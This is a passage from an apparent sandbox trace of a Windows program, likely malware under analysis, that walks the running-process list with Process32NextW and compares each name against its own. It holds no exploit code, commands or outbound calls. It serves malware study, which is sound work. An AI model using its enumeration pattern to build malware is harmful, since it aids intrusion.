cntThreads=0x1e, th32ParentProcessID=0x5f4, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0063.019] lstrcpyW (in: lpString1=0x617e74, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0063.019] Process32NextW (in: hSnapshot=0x10c, lppe=0x18bfb14 | out: lppe=0x18bfb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x66c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x354, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0063.020] lstrcpyW (in: lpString1=0x61808c, lpString2="taskeng.exe" | out: lpString1="taskeng.exe") returned="taskeng.exe" [0063.020] Process32NextW (in: hSnapshot=0x10c, lppe=0x18bfb14 | out: lppe=0x18bfb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x354, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0063.021] Process32NextW (in: hSnapshot=0x10c, lppe=0x18bfb14 | out: lppe=0x18bfb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x410, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x354, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0063.021] Process32NextW (in: hSnapshot=0x10c, lppe=0x18bfb14 | out: lppe=0x18bfb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0063.022] Process32NextW (in: hSnapshot=0x10c, lppe=0x18bfb14 | out: lppe=0x18bfb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="blowiranlaboratorydisaster.exe")) returned 1 [0063.022] lstrcpyW (in: lpString1=0x6182bc, lpString2="blowiranlaboratorydisaster.exe" | out: lpString1="blowiranlaboratorydisaster.exe") returned="blowiranlaboratorydisaster.exe" [0063.022] Process32NextW (in: hSnapshot=0x10c, lppe=0x18bfb14 | out: lppe=0x18bfb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="argentina conducting merchandise.exe")) returned 1 [0063.023] lstrcpyW (in: lpString1=0x6184e4, lpString2="argentina conducting merchandise.exe" | out: lpString1="argentina conducting merchandise.exe") returned="argentina conducting merchandise.exe" [0063.023] Process32NextW (in: hSnapshot=0x10c, lppe=0x18bfb14 | out: lppe=0x18bfb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x744, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="output.exe")) returned 1 [0063.024] lstrcpyW (in: lpString1=0x61870c, lpString2="output.exe" | out: lpString1="output.exe") returned="output.exe" [0063.024] Process32NextW (in: hSnapshot=0x10c, lppe=0x18bfb14 | out: lppe=0x18bfb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x528, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="bookings.exe")) returned 1 [0063.024] lstrcpyW (in: lpString1=0x618934, lpString2="bookings.exe" | out: lpString1="bookings.exe") returned="bookings.exe" [0063.024] Process32NextW (in: hSnapshot=0x10c, lppe=0x18bfb14 | out: lppe=0x18bfb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="lyrics-morning-effectiveness.exe")) returned 1 [0063.025] lstrcpyW (in: lpString1=0x618b5c, lpString2="lyrics-morning-effectiveness.exe" | out: lpString1="lyrics-morning-effectiveness.exe") returned="lyrics-morning-effectiveness.exe" [0063.025] Process32NextW (in: hSnapshot=0x10c, lppe=0x18bfb14 | out: lppe=0x18bfb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x46c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="involved-int-antenna-lol.exe")) returned 1 [0063.026] lstrcpyW (in: lpString1=0x618d84, lpString2="involved-int-antenna-lol.exe" | out: lpString1="involved-int-antenna-lol.exe") returned="involved-int-antenna-lol.exe" [0063.026] Process32NextW (in: hSnapshot=0x10c, lppe=0x18bfb14 | out: lppe=0x18bfb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="enterprise monsters comments.exe")) returned 1 [0063.026] lstrcpyW (in: lpString1=0x618fac, lpString2="enterprise monsters comments.exe" | out: lpString1="enterprise monsters comments.exe") returned="enterprise monsters comments.exe" [0063.026] Process32NextW (in: hSnapshot=0x10c, lppe=0x18bfb14 | out: lppe=0x18bfb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="food_logos_lot.exe")) returned 1 [0063.027] lstrcpyW (in: lpString1=0x6191d4, lpString2="food_logos_lot.exe" | out: lpString1="food_logos_lot.exe") returned="food_logos_lot.exe" [0063.027] Process32NextW (in: hSnapshot=0x10c, lppe=0x18bfb14 | out: lppe=0x18bfb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x814, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="designed.exe")) returned 1 [0063.028] lstrcpyW (in: lpString1=0x6193fc, lpString2="designed.exe" | out: lpString1="designed.exe") returned="designed.exe" [0063.028] Process32NextW (in: hSnapshot=0x10c, lppe=0x18bfb14 | out: lppe=0x18bfb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="chargetrackbacksobserve.exe")) returned 1 [0063.028] lstrcpyW (in: lpString1=0x619624, lpString2="chargetrackbacksobserve.exe" | out: lpString1="chargetrackbacksobserve.exe") returned="chargetrackbacksobserve.exe" [0063.028] Process32NextW (in: hSnapshot=0x10c, lppe=0x18bfb14 | out: lppe=0x18bfb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x834, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="info-began-nobody-tops.exe")) returned 1 [0063.029] lstrcpyW (in: lpString1=0x61984c, lpString2="info-began-nobody-tops.exe" | out: lpString1="info-began-nobody-tops.exe") returned="info-began-nobody-tops.exe" [0063.029] Process32NextW (in: hSnapshot=0x10c, lppe=0x18bfb14 | out: lppe=0x18bfb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x844, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="myers biggest qatar.exe")) returned 1 [0063.030] lstrcpyW (in: lpString1=0x619a74, lpString2="myers biggest qatar.exe" | out: lpString1="myers biggest qatar.exe") returned="myers biggest qatar.exe" [0063.030] Process32NextW (in: hSnapshot=0x10c, lppe=0x18bfb14 | out: lppe=0x18bfb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="invalid.exe")) returned 1 [0063.030] lstrcpyW (in: lpString1=0x619c9c, lpString2="invalid.exe" | out: lpString1="invalid.exe") returned="invalid.exe" [0063.030] Process32NextW (in: hSnapshot=0x10c, lppe=0x18bfb14 | out: lppe=0x18bfb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x864, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="panel-maria-suggestion.exe")) returned 1 [0063.031] lstrcpyW (in: lpString1=0x619ec4, lpString2="panel-maria-suggestion.exe" | out: lpString1="panel-maria-suggestion.exe") returned="panel-maria-suggestion.exe" [0063.031] Process32NextW (in: hSnapshot=0x10c, lppe=0x18bfb14 | out: lppe=0x18bfb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x874, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="remained universe sole.exe")) returned 1 [0063.033] lstrcpyW (in: lpString1=0x61a0ec, lpString2="remained universe sole.exe" | out: lpString1="remained universe sole.exe") returned="remained universe sole.exe" [0063.033] Process32NextW (in: hSnapshot=0x10c, lppe=0x18bfb14 | out: lppe=0x18bfb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="evanescence oscar em.exe")) returned 1 [0063.033] lstrcpyW (in: lpString1=0x61a314, lpString2="evanescence oscar em.exe" | out: lpString1="evanescence oscar em.exe") returned="evanescence oscar em.exe" [0063.033] Process32NextW (in: hSnapshot=0x10c, lppe=0x18bfb14 | out: lppe=0x18bfb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="fifth roller.exe")) returned 1 [0063.034] lstrcpyW (in: lpString1=0x61a53c, lpString2="fifth roller.exe" | out: lpString1="fifth roller.exe") returned="fifth roller.exe" [0063.034] Process32NextW (in: hSnapshot=0x10c, lppe=0x18bfb14 | out: lppe=0x18bfb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="irish.exe")) returned 1 [0063.035] lstrcpyW (in: lpString1=0x61a764, lpString2="irish.exe" | out: lpString1="irish.exe") returned="irish.exe" [0063.035] Process32NextW (in: hSnapshot=0x10c, lppe=0x18bfb14 | out: lppe=0x18bfb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="advocate-keep.exe")) returned 1 [0063.035] lstrcpyW (in: lpString1=0x61a98c, lpString2="advocate-keep.exe" | out: lpString1="advocate-keep.exe") returned="advocate-keep.exe" [0063.035] Process32NextW (in: hSnapshot=0x10c, lppe=0x18bfb14 | out: lppe=0x18bfb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="distributors.exe")) returned 1 [0063.036] lstrcpyW (in: lpString1=0x61abb4, lpString2="distributors.exe" | out: lpString1="distributors.exe") returned="distributors.exe" [0063.036] Process32NextW (in: hSnapshot=0x10c, lppe=0x18bfb14 | out: lppe=0x18bfb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighter.exe")) returned 1 [0063.037] lstrcpyW (in: lpString1=0x61addc, lpString2="lighter.exe" | out: lpString1="lighter.exe") returned="lighter.exe" [0063.037] Process32NextW (in: hSnapshot=0x10c, lppe=0x18bfb14 | out: lppe=0x18bfb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="lease-entitled-pcs.exe")) returned 1 [0063.037] lstrcpyW (in: lpString1=0x61b004, lpString2="lease-entitled-pcs.exe" | out: lpString1="lease-entitled-pcs.exe") returned="lease-entitled-pcs.exe" [0063.037] Process32NextW (in: hSnapshot=0x10c, lppe=0x18bfb14 | out: lppe=0x18bfb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="nerve-bracelet.exe")) returned 1 [0063.038] lstrcpyW (in: lpString1=0x61b22c, lpString2="nerve-bracelet.exe" | out: lpString1="nerve-bracelet.exe") returned="nerve-bracelet.exe" [0063.038] Process32NextW (in: hSnapshot=0x10c, lppe=0x18bfb14 | out: lppe=0x18bfb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="WINWORD.EXE")) returned 1 [0063.039] lstrcpyW (in: lpString1=0x61b454, lpString2="WINWORD.EXE" | out: lpString1="WINWORD.EXE") returned="WINWORD.EXE" [0063.039] Process32NextW (in: hSnapshot=0x10c, lppe=0x18bfb14 | out: lppe=0x18bfb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OSPPSVC.EXE")) returned 1 [0063.039] lstrcpyW (in: lpString1=0x61b67c, lpString2="OSPPSVC.EXE" | out: lpString1="OSPPSVC.EXE") returned="OSPPSVC.EXE" [0063.039] Process32NextW (in: hSnapshot=0x10c, lppe=0x18bfb14 | out: lppe=0x18bfb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xaf8, pcPriClassBase=8, dwFlags=0x0, szExeFile="serverhost.exe")) returned 1 [0063.040] lstrcpyW (in: lpString1=0x61b8a4, lpString2="serverhost.exe" | out: lpString1="serverhost.exe") returned="serverhost.exe" [0063.040] Process32NextW (in: hSnapshot=0x10c, lppe=0x18bfb14 | out: lppe=0x18bfb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xaf8, pcPriClassBase=8, dwFlags=0x0, szExeFile="serverhost.exe")) returned 0 [0063.041] CloseHandle (hObject=0x10c) returned 1 [0063.041] lstrlenW (lpString="serverhost.exe") returned 14 [0063.041] lstrlenW (lpString="OSPPSVC.EXE") returned 11 [0063.041] lstrlenW (lpString="WINWORD.EXE") returned 11 [0063.041] lstrlenW (lpString="nerve-bracelet.exe") returned 18 [0063.041] lstrlenW (lpString="lease-entitled-pcs.exe") returned 22 [0063.041] lstrlenW (lpString="lighter.exe") returned 11 [0063.041] lstrlenW (lpString="distributors.exe") returned 16 [0063.041] lstrlenW (lpString="advocate-keep.exe") returned 17 [0063.041] lstrlenW (lpString="irish.exe") returned 9 [0063.041] lstrlenW (lpString="fifth roller.exe") returned 16 [0063.041] lstrlenW (lpString="evanescence oscar em.exe") returned 24 [0063.041] lstrlenW (lpString="remained universe sole.exe") returned 26 [0063.041] lstrlenW (lpString="panel-maria-suggestion.exe") returned 26 [0063.041] lstrlenW (lpString="invalid.exe") returned 11 [0063.041] lstrlenW (lpString="myers biggest qatar.exe") returned 23 [0063.041] lstrlenW (lpString="info-began-nobody-tops.exe") returned 26 [0063.041] lstrlenW (lpString="chargetrackbacksobserve.exe") returned 27 [0063.041] lstrlenW (lpString="designed.exe") returned 12 [0063.041] lstrlenW (lpString="food_logos_lot.exe") returned 18 [0063.041] lstrlenW (lpString="enterprise monsters comments.exe") returned 32 [0063.041] lstrlenW (lpString="involved-int-antenna-lol.exe") returned 28 [0063.041] lstrlenW (lpString="lyrics-morning-effectiveness.exe") returned 32 [0063.041] lstrlenW (lpString="bookings.exe") returned 12 [0063.041] lstrlenW (lpString="output.exe") returned 10 [0063.041] lstrlenW (lpString="argentina conducting merchandise.exe") returned 36 [0063.041] lstrlenW (lpString="blowiranlaboratorydisaster.exe") returned 30 [0063.041] lstrlenW (lpString="taskeng.exe") returned 11 [0063.041] lstrlenW (lpString="explorer.exe") returned 12 [0063.041] lstrlenW (lpString="dwm.exe") returned 7 [0063.041] lstrlenW (lpString="taskhost.exe") returned 12 [0063.041] lstrlenW (lpString="spoolsv.exe") returned 11 [0063.041] lstrlenW (lpString="audiodg.exe") returned 11 [0063.041] lstrlenW (lpString="svchost.exe") returned 11 [0063.041] lstrlenW (lpString="lsm.exe") returned 7 [0063.041] lstrlenW (lpString="lsass.exe") returned 9 [0063.041] lstrlenW (lpString="services.exe") returned 12 [0063.041] lstrlenW (lpString="winlogon.exe") returned 12 [0063.041] lstrlenW (lpString="wininit.exe") returned 11 [0063.041] lstrlenW (lpString="csrss.exe") returned 9 [0063.041] lstrlenW (lpString="smss.exe") returned 8 [0063.041] lstrlenW (lpString="System") returned 6 [0063.041] lstrlenW (lpString="[System Process]") returned 16 [0063.042] lstrcmpiW (lpString1="serverhost.exe", lpString2="serverhost.exe") returned 0 [0063.042] lstrcmpiW (lpString1="OSPPSVC.EXE", lpString2="serverhost.exe") returned -1 [0063.042] lstrcpyW (in: lpString1=0x61c2a0, lpString2="OSPPSVC.EXE" | out: lpString1="OSPPSVC.EXE") returned="OSPPSVC.EXE" [0063.042] lstrlenW (lpString="OSPPSVC.EXE") returned 11 [0063.042] lstrcmpiW (lpString1="WINWORD.EXE", lpString2="serverhost.exe") returned 1 [0063.042] lstrcpyW (in: lpString1=0x61c2b8, lpString2="WINWORD.EXE" | out: lpString1="WINWORD.EXE") returned="WINWORD.EXE" [0063.042] lstrlenW (lpString="WINWORD.EXE") returned 11 [0063.042] lstrcmpiW (lpString1="nerve-bracelet.exe", lpString2="serverhost.exe") returned -1 [0063.042] lstrcpyW (in: lpString1=0x61c2d0, lpString2="nerve-bracelet.exe" | out: lpString1="nerve-bracelet.exe") returned="nerve-bracelet.exe" [0063.042] lstrlenW (lpString="nerve-bracelet.exe") returned 18 [0063.042] lstrcmpiW (lpString1="lease-entitled-pcs.exe", lpString2="serverhost.exe") returned -1 [0063.042] lstrcpyW (in: lpString1=0x61c2f6, lpString2="lease-entitled-pcs.exe" | out: lpString1="lease-entitled-pcs.exe") returned="lease-entitled-pcs.exe" [0063.042] lstrlenW (lpString="lease-entitled-pcs.exe") returned 22 [0063.042] lstrcmpiW (lpString1="lighter.exe", lpString2="serverhost.exe") returned -1 [0063.042] lstrcpyW (in: lpString1=0x61c324, lpString2="lighter.exe" | out: lpString1="lighter.exe") returned="lighter.exe" [0063.042] lstrlenW (lpString="lighter.exe") returned 11 [0063.042] lstrcmpiW (lpString1="distributors.exe", lpString2="serverhost.exe") returned -1 [0063.042] lstrcpyW (in: lpString1=0x61c33c, lpString2="distributors.exe" | out: lpString1="distributors.exe") returned="distributors.exe" [0063.042] lstrlenW (lpString="distributors.exe") returned 16 [0063.042] lstrcmpiW (lpString1="advocate-keep.exe", lpString2="serverhost.exe") returned -1 [0063.042] lstrcpyW (in: lpString1=0x61c35e, lpString2="advocate-keep.exe" | out: lpString1="advocate-keep.exe") returned="advocate-keep.exe" [0063.042] lstrlenW (lpString="advocate-keep.exe") returned 17 [0063.042] lstrcmpiW (lpString1="irish.exe", lpString2="serverhost.exe") returned -1 [0063.042] lstrcpyW (in: lpString1=0x61c382, lpString2="irish.exe" | out: lpString1="irish.exe") returned="irish.exe" [0063.042] lstrlenW (lpString="irish.exe") returned 9 [0063.042] lstrcmpiW (lpString1="fifth roller.exe", lpString2="serverhost.exe") returned -1 [0063.042] lstrcpyW (in: lpString1=0x61c396, lpString2="fifth roller.exe" | out: lpString1="fifth roller.exe") returned="fifth roller.exe" [0063.042] lstrlenW (lpString="fifth roller.exe") returned 16 [0063.042] lstrcmpiW (lpString1="evanescence oscar em.exe", lpString2="serverhost.exe") returned -1 [0063.042] lstrcpyW (in: lpString1=0x61c3b8, lpString2="evanescence oscar em.exe" | out: lpString1="evanescence oscar em.exe") returned="evanescence oscar em.exe" [0063.042] lstrlenW (lpString="evanescence oscar em.exe") returned 24 [0063.042] lstrcmpiW (lpString1="remained universe sole.exe", lpString2="serverhost.exe") returned -1 [0063.042] lstrcpyW (in: lpString1=0x61c3ea, lpString2="remained universe sole.exe" | out: lpString1="remained universe sole.exe") returned="remained universe sole.exe" [0063.042] lstrlenW (lpString="remained universe sole.exe") returned 26 [0063.042] lstrcmpiW (lpString1="panel-maria-suggestion.exe", lpString2="serverhost.exe") returned -1 [0063.042] lstrcpyW (in: lpString1=0x61c420, lpString2="panel-maria-suggestion.exe" | out: lpString1="panel-maria-suggestion.exe") returned="panel-maria-suggestion.exe" [0063.042] lstrlenW (lpString="panel-maria-suggestion.exe") returned 26 [0063.042] lstrcmpiW (lpString1="invalid.exe", lpString2="serverhost.exe") returned -1 [0063.042] lstrcpyW (in: lpString1=0x61c456, lpString2="invalid.exe" | out: lpString1="invalid.exe") returned="invalid.exe" [0063.042] lstrlenW (lpString="invalid.exe") returned 11 [0063.042] lstrcmpiW (lpString1="myers biggest qatar.exe", lpString2="serverhost.exe") returned -1 [0063.042] lstrcpyW (in: lpString1=0x61c46e, lpString2="myers biggest qatar.exe" | out: lpString1="myers biggest qatar.exe") returned="myers biggest qatar.exe" [0063.042] lstrlenW (lpString="myers biggest qatar.exe") returned 23 [0063.043] lstrcmpiW (lpString1="info-began-nobody-tops.exe", lpString2="serverhost.exe") returned -1 [0063.043] lstrcpyW (in: lpString1=0x61c49e, lpString2="info-began-nobody-tops.exe" | out: lpString1="info-began-nobody-tops.exe") returned="info-began-nobody-tops.exe" [0063.043] lstrlenW (lpString="info-began-nobody-tops.exe") returned 26 [0063.043] lstrcmpiW (lpString1="chargetrackbacksobserve.exe", lpString2="serverhost.exe") returned -1 [0063.043] lstrcpyW (in: lpString1=0x61c4d4, lpString2="chargetrackbacksobserve.exe" | out: lpString1="chargetrackbacksobserve.exe") returned="chargetrackbacksobserve.exe" [0063.043] lstrlenW (lpString="chargetrackbacksobserve.exe") returned 27 [0063.043] lstrcmpiW (lpString1="designed.exe", lpString2="serverhost.exe") returned -1 [0063.043] lstrcpyW (in: lpString1=0x61c50c, lpString2="designed.exe" | out: lpString1="designed.exe") returned="designed.exe" [0063.043] lstrlenW (lpString="designed.exe") returned 12 [0063.043] lstrcmpiW (lpString1="food_logos_lot.exe", lpString2="serverhost.exe") returned -1 [0063.043] lstrcpyW (in: lpString1=0x61c526, lpString2="food_logos_lot.exe" | out: lpString1="food_logos_lot.exe") returned="food_logos_lot.exe" [0063.043] lstrlenW (lpString="food_logos_lot.exe") returned 18 [0063.043] lstrcmpiW (lpString1="enterprise monsters comments.exe", lpString2="serverhost.exe") returned -1 [0063.043] lstrcpyW (in: lpString1=0x61c54c, lpString2="enterprise monsters comments.exe" | out: lpString1="enterprise monsters comments.exe") returned="enterprise monsters comments.exe" [0063.043] lstrlenW (lpString="enterprise monsters comments.exe") returned 32 [0063.043] lstrcmpiW (lpString1="involved-int-antenna-lol.exe", lpString2="serverhost.exe") returned -1 [0063.043] lstrcpyW (in: lpString1=0x61c58e, lpString2="involved-int-antenna-lol.exe" | out: lpString1="involved-int-antenna-lol.exe") returned="involved-int-antenna-lol.exe" [0063.043] lstrlenW (lpString="involved-int-antenna-lol.exe") returned 28 [0063.043] lstrcmpiW (lpString1="lyrics-morning-effectiveness.exe", lpString2="serverhost.exe") returned -1 [0063.043] lstrcpyW (in: lpString1=0x61c5c8, lpString2="lyrics-morning-effectiveness.exe" | out: lpString1="lyrics-morning-effectiveness.exe") returned="lyrics-morning-effectiveness.exe" [0063.043] lstrlenW (lpString="lyrics-morning-effectiveness.exe") returned 32 [0063.043] lstrcmpiW (lpString1="bookings.exe", lpString2="serverhost.exe") returned -1 [0063.043] lstrcpyW (in: lpString1=0x61c60a, lpString2="bookings.exe" | out: lpString1="bookings.exe") returned="bookings.exe" [0063.043] lstrlenW (lpString="bookings.exe") returned 12 [0063.043] lstrcmpiW (lpString1="output.exe", lpString2="serverhost.exe") returned -1 [0063.043] lstrcpyW (in: lpString1=0x61c624, lpString2="output.exe" | out: lpString1="output.exe") returned="output.exe" [0063.043] lstrlenW (lpString="output.exe") returned 10 [0063.043] lstrcmpiW (lpString1="argentina conducting merchandise.exe", lpString2="serverhost.exe") returned -1 [0063.043] lstrcpyW (in: lpString1=0x61c63a, lpString2="argentina conducting merchandise.exe" | out: lpString1="argentina conducting merchandise.exe") returned="argentina conducting merchandise.exe" [0063.043] lstrlenW (lpString="argentina conducting merchandise.exe") returned 36 [0063.043] lstrcmpiW (lpString1="blowiranlaboratorydisaster.exe", lpString2="serverhost.exe") returned -1 [0063.043] lstrcpyW (in: lpString1=0x61c684, lpString2="blowiranlaboratorydisaster.exe" | out: lpString1="blowiranlaboratorydisaster.exe") returned="blowiranlaboratorydisaster.exe" [0063.043] lstrlenW (lpString="blowiranlaboratorydisaster.exe") returned 30 [0063.043] lstrcmpiW (lpString1="taskeng.exe", lpString2="serverhost.exe") returned 1 [0063.043] lstrcpyW (in: lpString1=0x61c6c2, lpString2="taskeng.exe" | out: lpString1="taskeng.exe") returned="taskeng.exe" [0063.043] lstrlenW (lpString="taskeng.exe") returned 11 [0063.043] lstrcmpiW (lpString1="explorer.exe", lpString2="serverhost.exe") returned -1 [0063.043] lstrcpyW (in: lpString1=0x61c6da, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0063.043] lstrlenW (lpString="explorer.exe") returned 12 [0063.043] lstrcmpiW (lpString1="dwm.exe", lpString2="serverhost.exe") returned -1 [0063.043] lstrcpyW (in: lpString1=0x61c6f4, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0063.043] lstrlenW (lpString="dwm.exe") returned 7 [0063.043] lstrcmpiW (lpString1="taskhost.exe", lpString2="serverhost.exe") returned 1 [0063.044] lstrcpyW (in: lpString1=0x61c704, lpString2="taskhost.exe" | out: lpString1="taskhost.exe") returned="taskhost.exe" [0063.044] lstrlenW (lpString="taskhost.exe") returned 12 [0063.044] lstrcmpiW (lpString1="spoolsv.exe", lpString2="serverhost.exe") returned 1 [0063.044] lstrcpyW (in: lpString1=0x61c71e, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0063.044] lstrlenW (lpString="spoolsv.exe") returned 11 [0063.044] lstrcmpiW (lpString1="audiodg.exe", lpString2="serverhost.exe") returned -1 [0063.044] lstrcpyW (in: lpString1=0x61c736, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0063.044] lstrlenW (lpString="audiodg.exe") returned 11 [0063.044] lstrcmpiW (lpString1="svchost.exe", lpString2="serverhost.exe") returned 1 [0063.044] lstrcpyW (in: lpString1=0x61c74e, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0063.044] lstrlenW (lpString="svchost.exe") returned 11 [0063.044] lstrcmpiW (lpString1="lsm.exe", lpString2="serverhost.exe") returned -1 [0063.044] lstrcpyW (in: lpString1=0x61c766, lpString2="lsm.exe" | out: lpString1="lsm.exe") returned="lsm.exe" [0063.044] lstrlenW (lpString="lsm.exe") returned 7 [0063.044] lstrcmpiW (lpString1="lsass.exe", lpString2="serverhost.exe") returned -1 [0063.044] lstrcpyW (in: lpString1=0x61c776, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0063.044] lstrlenW (lpString="lsass.exe") returned 9 [0063.044] lstrcmpiW (lpString1="services.exe", lpString2="serverhost.exe") returned 1 [0063.044] lstrcpyW (in: lpString1=0x61c78a, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0063.044] lstrlenW (lpString="services.exe") returned 12 [0063.044] lstrcmpiW (lpString1="winlogon.exe", lpString2="serverhost.exe") returned 1 [0063.044] lstrcpyW (in: lpString1=0x61c7a4, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0063.044] lstrlenW (lpString="winlogon.exe") returned 12 [0063.044] lstrcmpiW (lpString1="wininit.exe", lpString2="serverhost.exe") returned 1 [0063.044] lstrcpyW (in: lpString1=0x61c7be, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0063.044] lstrlenW (lpString="wininit.exe") returned 11 [0063.044] lstrcmpiW (lpString1="csrss.exe", lpString2="serverhost.exe") returned -1 [0063.044] lstrcpyW (in: lpString1=0x61c7d6, lpString2="csrss.exe" | out: lpString1="csrss.exe") 